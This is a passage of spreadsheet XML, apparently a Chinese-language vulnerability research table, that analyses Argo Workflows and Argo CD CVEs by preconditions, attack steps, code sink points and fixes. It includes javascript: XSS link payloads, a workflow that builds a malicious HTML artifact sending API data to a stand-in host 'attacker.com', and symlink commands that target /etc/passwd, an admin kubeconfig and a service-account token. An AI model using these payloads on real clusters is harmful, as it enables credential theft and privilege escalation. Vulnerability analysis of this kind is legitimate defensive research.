- 恶意配置被应用
- 链接显示在事件源日志页面
- 等待用户访问触发
步骤 3：攻击触发
- 用户访问 Argo Workflows 仪表板
- 进入事件源的日志查看页面
- 点击伪装的日志分析链接
- 触发 XSS 执行</t>
  </si>
  <si>
    <t>ConfigMap
步骤 1：注入恶意配置
ConfigMap:
  data:
    links: |
      - name: "Event Log Analysis"      # 伪装成日志分析工具
        url: "javascript:alert('XSS')"  # 恶意 JavaScript
        scope: event-source-logs       # 在事件源日志页面显示</t>
  </si>
  <si>
    <t>ADA-ARGO-SA-08: XSS in Pod link url</t>
  </si>
  <si>
    <t>Argo Workflows allows users to add a button in the “Summary” view of a pod. This could be
a link to the logging facility for the given pod. The text and URL of the button can be
specified via a ConfigMap as is demonstrated here:
https://github.com/argoproj/argo-workflows/blob/master/docs/workflow-controller-configmap.
yaml#L60.
An attacker who controls the Config Map can specify a malicious url value and launch an
attack through a reflected XSS vector against other users of the dashboard. If the attacker
controls the Config Map, they have admin privi</t>
  </si>
  <si>
    <t>权限需求：
- ConfigMap 的控制权限
- 管理员级别权限
环境要求：
- Argo Workflows 启用了 Pod Summary 视图
- 启用了自定义按钮功能</t>
  </si>
  <si>
    <t>步骤 1：配置注入
ConfigMap 配置：
  data:
    links: |
      - name: "Pod Log Viewer"         # 伪装成正常的日志查看按钮
        url: "javascript:alert('XSS')"  # 恶意代码
        scope: pod-summary            # 在 Pod Summary 页面显示
步骤 2：部署等待
- 恶意配置被应用到集群
- 按钮出现在 Pod Summary 页面
- 等待用户点击触发
步骤 3：漏洞利用
- 用户访问 Argo Workflows 仪表板
- 导航到某个 Pod 的 Summary 页面
- 点击看似正常的日志查看按钮
- 触发 XSS 执行</t>
  </si>
  <si>
    <t>ConfigMap
ConfigMap 配置：
  data:
    links: |
      - name: "Pod Log Viewer"         # 伪装成正常的日志查看按钮
        url: "javascript:alert('XSS')"  # 恶意代码
        scope: pod-summary            # 在 Pod Summary 页面显示</t>
  </si>
  <si>
    <t>CVE-2022-29164</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Argo Workflows 中的 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">存储型 XSS（跨站脚本）与 CSRF（跨站请求伪造）的组合利用漏洞，允许已授权的内部攻击者通过诱导受害者访问恶意构造的 HTML 工件，间接利用受害者的会话权限操作 Argo Server API，进而实施越权攻击。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>漏洞根本原因：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Argo Workflows 未对 HTML 工件实施内容安全策略（CSP），允许内联脚本执行。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
其他攻击方式：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
非可执行类型（文本、Markdown）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FFFF0000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 仅可用于钓鱼攻击，需依赖用户交互。
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">The attacker creates a workflow that produces a HTML artifact that contains a HTML file that contains a script </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>which uses XHR calls to interact with the Argo Server API.</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
The attacker emails the deep-link to the artifact to their victim. The victim opens the link, the script starts running.</t>
    </r>
  </si>
  <si>
    <t>&gt;= v2.6.0</t>
  </si>
  <si>
    <t xml:space="preserve">v3.2.11, v3.3.5
https://github.com/argoproj/argo-workflows/pull/8585/commits
https://github.com/argoproj/argo-workflows/pull/8585
</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9</t>
  </si>
  <si>
    <t>必要条件：
- 攻击者必须是内部人员
- 需要访问相同集群的权限
- 能够运行自己的工作流
- 了解受害者系统架构</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>步骤 1：创建恶意工作流
- 攻击者创建生成 HTML 制品的工作流（workflow)
- HTML 包含恶意脚本-&gt; HTML 文件中嵌入 JavaScript，通过 XMLHttpRequest (XHR) 调用 Argo Server API（如列举/创建/删除 Workflow）。
（脚本使用 XHR 调用 Argo Server API）
步骤 2：社会工程学攻击
- 攻击者向受害者发送制品的深度链接
- 受害者打开链接
- 恶意脚本开始执行
攻击者通过邮件或消息发送深链接（Deep Link）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">，指向托管在 Argo 工件存储（如 S3/MinIO）中的恶意 HTML。
示例： https://argo-server/artifacts/&lt;namespace&gt;/&lt;workflow-name&gt;/malicious.html
步骤 3：利用受害者权限
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">信息泄露：列举命名空间内的 Workflow 及其敏感数据（如镜像、环境变量）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">资源操控：创建/删除 Workflow，注入恶意容器或横向移动载荷。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">权限提升：若受害者具备集群管理权限，攻击者可间接接管集群
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>攻击者生成恶意 HTML 工件 → 受害者访问该工件的 URL → 浏览器解析并执行内联脚本。</t>
    </r>
  </si>
  <si>
    <t>提权（存储型xss+csrf)</t>
  </si>
  <si>
    <t>垂直提权
（借用内部高权限用户的权限）</t>
  </si>
  <si>
    <t>集群范围（ 部分提权或者提成到集群管理员)</t>
  </si>
  <si>
    <t xml:space="preserve">外部输入源： 文件引用
（html 工件脚本）
攻击者通过生成并引用外部文件（HTML 工件）注入恶意脚本，依赖系统信任该文件来源。
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">在这个漏洞中，攻击者通过工作流的制品（Artifacts）字段进行注入。
具体示例：
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  name: malicious-artifact-workflow
spec:
  templates:
  - name: xss-template
    container:
      image: nginx
      command: [bash, -c]
      args:
        - |
          cat &lt;&lt;EOF &gt; /tmp/malicious.html
          &lt;html&gt;
            &lt;script&gt;
              // 恶意脚本，使用 XHR 调用 Argo Server API
              fetch('/api/v1/workflows/')
                .then(response =&gt; response.json())
                .then(data =&gt; {
                  // 发送数据到攻击者服务器
                  fetch('https://attacker.com/collect', {
                    method: 'POST',
                    body: JSON.stringify(data)
                  });
                });
            &lt;/script&gt;
          &lt;/html&gt;
          EOF
    outputs:
      artifacts:
      - name: malicious-html
        </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>path: /tmp/malicious.html    # 注入点：制品路径</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
        archive:
          none: {}                   # 使用无压缩格式以确保 HTML 可直接执行
----
outputs:
  artifacts:
  - name: malicious-html     # 制品名称可以是任意值
    path: /tmp/malicious.html    # 注入点：指向包含恶意 HTML 的路径
    archive:
      none: {}               # 确保内容不被压缩，可直接执行</t>
    </r>
  </si>
  <si>
    <t>两个字段配合使用：
1. container.commadnd 命令执行
2. outputs:
  artifacts: 指定文件路径</t>
  </si>
  <si>
    <t>CRD 资源</t>
  </si>
  <si>
    <t>无具体文档说明</t>
  </si>
  <si>
    <t>命令执行、
路径匹配</t>
  </si>
  <si>
    <t>外部不可信输入源-&gt; 系统信任的存储服务（S3,MiniIO等）</t>
  </si>
  <si>
    <t xml:space="preserve">字段值本身不需要验证，需要验证的是字段值所指向的文件的内容
-&gt; 无验证直接使用
</t>
  </si>
  <si>
    <t>服务端处理HTTP 请求相应-&gt; 网络请求的访问和响应</t>
  </si>
  <si>
    <t>否
直接调用go-client库进行读资源请求</t>
  </si>
  <si>
    <t xml:space="preserve">入口-》 argo-server restful api 请求响应处理
server\apiserver\argoserver.go
httpServer := as.newHTTPServer(ctx, port, artifactServer)
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>组件间交互 1：生成与存储恶意工件</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Workflow Controller → Artifact 存储服务</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
攻击者通过 Argo Workflow 生成恶意 HTML 文件，存储至 S3 等外部存储服务。
漏洞条件：Workflow Controller 未对 HTML 文件内容进行安全审查（如 CSP 策略）。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>组件间交互 2：用户访问恶意链接</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>用户浏览器 → Argo Server
用户通过 Argo Server 的 URL（如 /artifacts/...）请求恶意 HTML 文件。</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
漏洞条件：Argo Server 未正确设置 HTTP 安全头（如 Content-Security-Policy）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">组件间交互 3：脚本调用 API
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>用户浏览器 → Argo Server API</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
恶意脚本在用户浏览器中执行，携带受害者会话 Cookie 直接调用 Argo Server API（如 GET /api/v1/workflows）。
漏洞条件：API 未校验请求来源（CSRF Token 缺失），完全依赖会话 Cookie 鉴权。</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
argo-server -&gt; artiface server ( api</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>路径对应相应的handler 函数）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">错误直接返回的是服务器响应
func (a *ArtifactServer) serverInternalError(err error, w http.ResponseWriter) {
 w.WriteHeader(500)
 _, _ = w.Write([]byte(err.Error()))
}
</t>
  </si>
  <si>
    <t>关键操作函数本身不存在跨组件</t>
  </si>
  <si>
    <t xml:space="preserve">调用深度：1层
returnArtifact-&gt;err = driver.Load(art, tmpPath)
    if err != nil {
        return err
    }
    file, err := os.Open(filepath.Clean(tmpPath))
    if err != nil {
        return err
    }
http.ServeContent(w, r, "", time.Time{}, file) // sink点
</t>
  </si>
  <si>
    <t xml:space="preserve">artfact-server( 非控制器，但存在资源读操作的组件）
</t>
  </si>
  <si>
    <t>增加check
重新引入 HTTP 安全头部，但改为直接通过环境变量读取 + 默认严格策略</t>
  </si>
  <si>
    <t>验证逻辑增加：添加特定的HTTP响应头</t>
  </si>
  <si>
    <t>与sink点在同一函数中</t>
  </si>
  <si>
    <t>内置sanitizer(实施csp 策略）</t>
  </si>
  <si>
    <t>CVE-2022-31036 (与CVE-2022-24348相似）</t>
  </si>
  <si>
    <t xml:space="preserve">ADA-ARGO-SA-15: Path traversal leading to arbitrary YAML
file read with malicious Helm chart
</t>
  </si>
  <si>
    <t>静态分析-&gt; 辅助人工代码审计</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">All unpatched versions of Argo CD starting with v1.3.0 are vulnerable to a symlink following bug allowing a malicious user with repository write access to leak sensitive YAML files from Argo CD's repo-server.
A malicious Argo CD user with write access for a repository which is (or may be) used in a Helm-type Application may commit a symlink which points to an out-of-bounds file. If the target file is a valid YAML file, the attacker can read the contents of that file.
Sensitive files which could be leaked include manifest files from other Applications' source repositories (potentially decrypted files, if you are using a decryption plugin) or any YAML-formatted secrets which have been mounted as files on the repo-server.
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>CVE-2022-31054 漏洞利用前提分析
该漏洞允许拥有仓库写入权限的攻击者通过符号链接（Symlink）读取 Argo CD repo-server 组件上的敏感 YAML 文件</t>
    </r>
  </si>
  <si>
    <t>1.3.0 through 2.1.15, 2.2.9, 2.3.4, 2.4.0</t>
  </si>
  <si>
    <t>2.1.16, 2.2.10, 2.3.5, 2.4.1
https://github.com/argoproj/argo-cd/commit/04c305396458508a31d03d44afea07b1c620d7cd</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm</t>
  </si>
  <si>
    <t>argo-cd</t>
  </si>
  <si>
    <t xml:space="preserve">1. Argo CD 版本未修复且存在漏洞
​影响版本：所有从 v1.3.0 开始且未升级到修复版本（如 v2.4.5+、v2.3.10+）的 Argo CD 实例。
​修复方案：通过升级或应用补丁禁用符号链接解析。
​2. 攻击者拥有目标仓库的写入权限
​权限要求：攻击者需能向 Argo CD 使用的 Git 仓库提交代码（如通过 Git 推送权限或协作仓库的 PR/MR 权限）。
​攻击入口：
直接写入主分支。
提交到可能被合并的分支（若仓库配置为自动同步未审核的分支）。
​3. 目标仓库被用于 Helm 类型应用
​Helm 类型应用的特性：
Helm Chart 允许通过 dependencies 或 subcharts 引用外部资源，而 Argo CD 在处理 Helm 应用时未严格限制符号链接路径解析。
​漏洞触发点：
当 repo-server 处理 Helm Chart 时，若 Chart 中包含恶意符号链接，且指向 repo-server 本地的敏感文件，则会被解析并返回给攻击者。
​4. 符号链接指向敏感文件且符合条件
​敏感文件路径要求：
文件需位于 repo-server Pod 的文件系统中（如其他应用的源码目录、挂载的 Secret/ConfigMap 文件）。
文件必须为 ​有效的 YAML 格式​（否则会被解析失败丢弃）。
​典型敏感文件示例：
其他应用的 deployment.yaml 或 secret.yaml（尤其是使用解密插件后的明文文件）。
挂载到 repo-server 的 Kubernetes Secret（如 spec.sources.helm.valuesFrom.secretKeyRef 引用的文件）。
系统敏感文件（如 /etc/kubernetes/admin.conf，若挂载到容器内）。
​5. 文件系统隔离不足
​跨应用源码存储：
若多个应用的源码仓库被克隆到 repo-server 的同一根目录（如 /tmp 或 /app/repos），符号链接可横向访问其他应用的源码文件。
​挂载敏感卷：
repo-server Pod 挂载了包含敏感数据的卷（如 Secret 卷），且文件路径可被符号链接指向。
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">漏洞利用流程
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">提交恶意 Helm Chart：
攻击者向仓库提交包含符号链接的 Helm Chart，例如：
bash
ln -s /etc/kubernetes/secrets/argo-cd-admin.conf charts/malicious-link.yaml
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">触发 Argo CD 同步：
当 repo-server 处理该 Helm 应用时，解析符号链接并读取目标文件。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">泄露敏感数据：
若目标文件是有效 YAML，其内容会被包含在 Helm 生成的清单中，并通过 Argo CD UI 或 API 暴露给攻击者。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>攻击流程：
-----</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
提交恶意 Chart：
将包含符号链接的 Helm Chart 推送到 Git 仓库的 malicious-chart 目录。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">创建 Argo CD Application：
应用上述 Application 资源，Argo CD 的 repo-server 会拉取仓库并解析该 Chart。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">触发路径遍历：
GetAppDetails() 方法调用 populateHelmAppDetails() 时，加载 values.yaml 符号链接，读取其指向的敏感文件（如 /etc/passwd）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">数据泄露：
敏感文件内容会出现在以下位置：
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Argo CD UI：在应用的详情页面中显示 values.yaml 解析后的参数。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">API 响应：通过 RepoServerAppDetailsQuery 请求返回的 res.Helm.Values 字段。
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>-----</t>
    </r>
  </si>
  <si>
    <t>权限提升（路径遍历导致的任意文件读）</t>
  </si>
  <si>
    <t>单节点（ 读取宿主机上的特定文件)</t>
  </si>
  <si>
    <t>是
（ 需要有人工上传恶意的符号链接文件的环节）</t>
  </si>
  <si>
    <t xml:space="preserve">校验缺失 </t>
  </si>
  <si>
    <t>外部输入源： 文件引用</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. 恶意 Helm Chart 结构
假设攻击者在 Git 仓库中提交如下结构的 Helm Chart：
bash
# 仓库目录结构
malicious-chart/
├── Chart.yaml          # Helm Chart 元数据
└── values.yaml -&gt; /etc/passwd  # 符号链接指向敏感文件
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Chart.yaml
yaml
apiVersion: v2
name: malicious-chart
description: A Helm chart to exploit path traversal
type: application
version: 0.1.0
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>values.yaml（符号链接）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
bash
# 在本地创建符号链接（需提交到 Git 仓库）
ln -s /etc/passwd malicious-chart/values.yaml
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>2. Argo CD Application 资源配置</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
攻击者通过以下 Application 资源触发漏洞：
yaml
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: vulnerable-helm-app
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/attacker/malicious-repo.git  # 恶意仓库地址
    path: malicious-chart                                   # 指向恶意 Chart 的路径
    targetRevision: HEAD                                    # 使用最新提交
    helm:
   </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">   valueFiles:
        - values.yaml  # 显式指定加载 values.yaml（符号链接）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  destination:
    server: https://kubernetes.default.svc
    namespace: default
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>具体攻击流程示例分析：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
结合repo-server的单体文件结构特征（所有应用的源码统一存储在类似/tmp/repo的目录下），攻击者可通过以下步骤完成攻击16：
提交包含恶意路径的Helm Chart（如values.yaml: /var/run/secrets/kubernetes.io/serviceaccount/token）。
利用url.ParseRequestURI()的误判，使该路径被标记为"合法URI"。
绕过EnforceToCurrentRoot()校验，直接读取目标敏感文件。
通过Argo CD API或UI泄露文件内容。</t>
    </r>
  </si>
  <si>
    <t>数据面（容器） → 宿主机
（ repo-server 容器所在的宿主机上获取文件）</t>
  </si>
  <si>
    <t>存在验证机制</t>
  </si>
  <si>
    <t>文件操作-&gt; 读操作
（路径遍历-&gt; 符号链接跟随）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">经典控制器
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
CLI 命令的实现（argocd app diff、sync、manifests 等命令属于 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>客户端工具链，其实现通常位于 Argo CD 的 cmd 包或独立的 CLI 模块中，而非控制器核心逻辑中。这些命令通过调用 Argo CD API 或直接操作 Kubernetes API 实现功能。）</t>
    </r>
  </si>
  <si>
    <t>控制器模式、
直接调用资源读写API</t>
  </si>
  <si>
    <t>关键操作存在跨组件操作（grpc)</t>
  </si>
  <si>
    <t xml:space="preserve">存在资源状态更新
控制器模式中：
